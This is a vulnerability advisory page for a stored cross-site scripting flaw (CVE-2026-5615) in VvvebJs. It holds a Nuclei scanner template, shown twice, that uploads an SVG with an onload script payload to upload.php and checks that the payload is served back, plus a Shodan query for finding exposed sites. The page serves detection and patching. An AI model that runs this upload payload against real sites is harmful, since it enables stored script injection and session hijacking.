VvvebJs <= 2.0.5 - Cross-Site Scripting

CVE-2026-5615

Verified

Description

Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the "uploadAllowExtensions" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.

Severity

Medium

CVSS Score

4.3

Exploit Probability

Published Date

April 6, 2026

Template Author

theamanrawat

CVE-2026-5615.yaml

id: CVE-2026-5615

info:
  name: VvvebJs <= 2.0.5 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the "uploadAllowExtensions" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary scripts, potentially leading to session hijacking or user impersonation.
  remediation: |
    Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.
  reference:
    - https://github.com/advisories/GHSA-p873-9x3v-gmvh
    - https://github.com/givanz/VvvebJs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-5615
    epss-score: 0.01254
    epss-percentile: 0.79606
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.html:"VvvebJs"
  tags: cve,cve2026,xss,stored-xss,file-upload,svg,vvvebjs

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=--nuclei{{randstr_1}}

        ----nuclei{{randstr_1}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.svg"
        Content-Type: image/svg+xml

        <?xml version="1.0" standalone="no"?>
        <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
        <text x="10" y="20">{{randstr}}</text>
        </svg>
        ----nuclei{{randstr_1}}--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

    extractors:
      - type: regex
        name: upload_path
        part: body
        group: 0
        regex:
          - '/[a-zA-Z0-9_-]+\.svg'
        internal: true

  - raw:
      - |
        GET {{upload_path}} HTTP/1.1
        Host: {{Hostname}}

    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{randstr}}", "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">")'
          - 'contains(content_type, "image/svg+xml")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008e54eb8c16fb5570e2c0d281d55360166c9a8ee808658170c63388c0f0ae6fac02205f84c074165b1fec5c34ae2933aec71e1b1b0f1aca54ba3427a950f7fd6068e1:922c64590222798bb761d5b6d8e72950

4.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE ID:

cve-2026-5615

CWE ID:

cwe-79

References

https://github.com/advisories/GHSA-p873-9x3v-gmvh https://github.com/givanz/VvvebJs

Remediation Steps

Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.

id: CVE-2026-5615

info:
  name: VvvebJs <= 2.0.5 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the "uploadAllowExtensions" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary scripts, potentially leading to session hijacking or user impersonation.
  remediation: |
    Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.
  reference:
    - https://github.com/advisories/GHSA-p873-9x3v-gmvh
    - https://github.com/givanz/VvvebJs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-5615
    epss-score: 0.01254
    epss-percentile: 0.79606
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.html:"VvvebJs"
  tags: cve,cve2026,xss,stored-xss,file-upload,svg,vvvebjs

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=--nuclei{{randstr_1}}

        ----nuclei{{randstr_1}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.svg"
        Content-Type: image/svg+xml

        <?xml version="1.0" standalone="no"?>
        <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
        <text x="10" y="20">{{randstr}}</text>
        </svg>
        ----nuclei{{randstr_1}}--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

    extractors:
      - type: regex
        name: upload_path
        part: body
        group: 0
        regex:
          - '/[a-zA-Z0-9_-]+\.svg'
        internal: true

  - raw:
      - |
        GET {{upload_path}} HTTP/1.1
        Host: {{Hostname}}

    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{randstr}}", "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">")'
          - 'contains(content_type, "image/svg+xml")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008e54eb8c16fb5570e2c0d281d55360166c9a8ee808658170c63388c0f0ae6fac02205f84c074165b1fec5c34ae2933aec71e1b1b0f1aca54ba3427a950f7fd6068e1:922c64590222798bb761d5b6d8e72950

VvvebJs <= 2.0.5 - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

VvvebJs <= 2.0.5 - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps